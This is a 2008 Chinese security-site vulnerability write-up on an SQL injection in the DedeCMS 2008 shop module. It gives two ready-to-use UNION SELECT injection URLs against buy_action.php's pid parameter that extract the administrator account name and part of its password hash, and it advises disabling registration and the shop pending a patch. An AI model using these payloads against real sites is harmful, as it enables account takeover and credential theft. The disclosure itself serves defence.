dede cms 08年过滤漏洞 - 网安中国--最大的网络安全门户--黑客网门户

用户名: 密码: 验证码: 注册
由kiqiSEO提供网站优化技术支持 | 高级搜索 | 收藏本站 | 网站地图 | RSS订阅 |
网安中国搜索

您现在的位置:主页>文章>漏洞分析 >

dede cms 08年过滤漏洞

作者: 叶羽抒 ,  出处:Safe86
时间:2008-04-23

dede cms 08漏洞

漏洞现象:注册地址:
/member/index_do.php?fmdo=user&dopost=regnew

爆管理帐号:
/member/buy_action.php?product=member&pid=1%20and%201=11%20union%20select%201,2,userid,4,5%20from%20%23@__admin/*
爆管理员密码
/member/buy_action.php?product=member&pid=1%20and%201=11%20union%20select%201,2,substring(pwd,9,16),4,5%20from%20%23@__admin/*

解释
注册用户后进入管理面版  
利用 上两段代码 暴出管理员  帐号密码

出现漏洞原因  dedecms 商城系统过滤指数不严      漏洞出现在buy_action.php 没有对pid传递进行足够的重视
导致出现SQL注射问题!
建议 先关闭 注册系统 以及商城
等待官方补丁

本漏洞已上报dedecms官方

最新评论

网友评论

用户名: 密码:  
广告服务 | 关于我们 | 招贤纳士 | 战略合作 | 联系我们 | 发展历程 | 友情链接 | 我要挑错
All Rights Reserved, Copyright 2008-2009, Safe86
申请备案中.... 如有意见请与我们联系 powered by 织梦内容管理系统